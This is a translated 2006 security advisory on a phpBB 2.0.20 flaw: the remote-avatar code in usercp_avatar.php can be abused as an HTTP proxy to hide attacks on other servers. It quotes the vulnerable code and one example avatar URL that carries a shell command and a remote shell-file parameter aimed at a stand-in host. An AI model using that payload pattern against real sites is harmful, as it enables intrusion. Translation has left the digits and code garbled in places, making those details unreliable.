phpBB can be used as HTTP proxy with vulnerability-vulnerability warning-the black bar safety net

2006-05-26T00:00:00
ID MYHACK58:6220069344
Type myhack58
Reporter 佚名
Modified 2006-05-26T00:00:00

Description

Affected system: phpBB Group phpBB 2.0.20 Description: -------------------------------------------------------------------------------- BUGTRAQ ID: 1 7 9 6 5

phpBB is a PHP language implementation of a Web-based open source Forum program, the use of more widely. It supports multiple databases as backend such as Oracle, MSSQL, MySql, PostGres, and so on.

phpBB on the user request processing on the presence of input validation vulnerabilities, a remote attacker could exploit this vulnerability in the phpBB server as the HTTP proxy used to hide the CGI attack the real source.

In phpBB usercp_avatar. php file 1 2 5-1 5 row 3:

... if ( $avatar_mode == remote && \ preg_match(/^(http:\/\/)? ([\w\-\.]+)\:? ([0-9])\/(.)$/, $avatar_filename, \ $url_ary) ) { if ( empty($url_ary[4]) ) { $error = true; $error_msg = ( ! empty($error_msg) ) ? $error_msg . . \ $lang[Incomplete_URL] : $lang[Incomplete_URL]; return; }

$base_get = / . $url_ary[4]; $port = ( ! empty($url_ary[3]) ) ? $url_ary[3] : 8 0;

if ( ! ($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) ) { $error = true; $error_msg = ( ! empty($error_msg) ) ? $error_msg . . \ $lang[No_connection_URL] : $lang[No_connection_URL]; return; }

@fputs($fsock, "GET $base_get HTTP/1.1\r\n"); @fputs($fsock, "HOST:" . $url_ary[2] . "\r\n"); @fputs($fsock, "Connection: close\r\n\r\n");

unset($avatar_data); while( !@ feof($fsock) ) { $avatar_data .= @fread($fsock, $board_config[avatar_filesize]); } @fclose($fsock); ...

phpBB does not check the user-provided value is based on the graphical extension the end, also did not check the supplied string contains“&”and“?” Character, thus the attacker can submit the similar to the following values:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt

phpBB will perform the following GET request:

GET /somescript. php? cmd=ls%2 0-la&xpl=http://somehost/someshell.txt HTTP/1.0 HOST: some_vulnerable. host Connection: close

So phpBB will be used as a HTTP proxy to access the other'sthe Web server.

<*source: rgod (rgod@autistici.org)

Links: http://marc.theaimsgroup.com/?l=bugtraq&m=1 1 4 7 4 6 9 0 5 8 0 5 3 4 1&w=2 http://marc.theaimsgroup.com/?l=bugtraq&m=1 1 4 7 7 1 0 8 2 4 0 4 4 8 3&w=2 *>

Recommendations: -------------------------------------------------------------------------------- Manufacturers patch:

phpBB Group ----------- The current vendor has not provided the patch or upgrade process, we recommend the use of this software users follow the manufacturer's home page to get the latest version:

http://www.phpbb.com/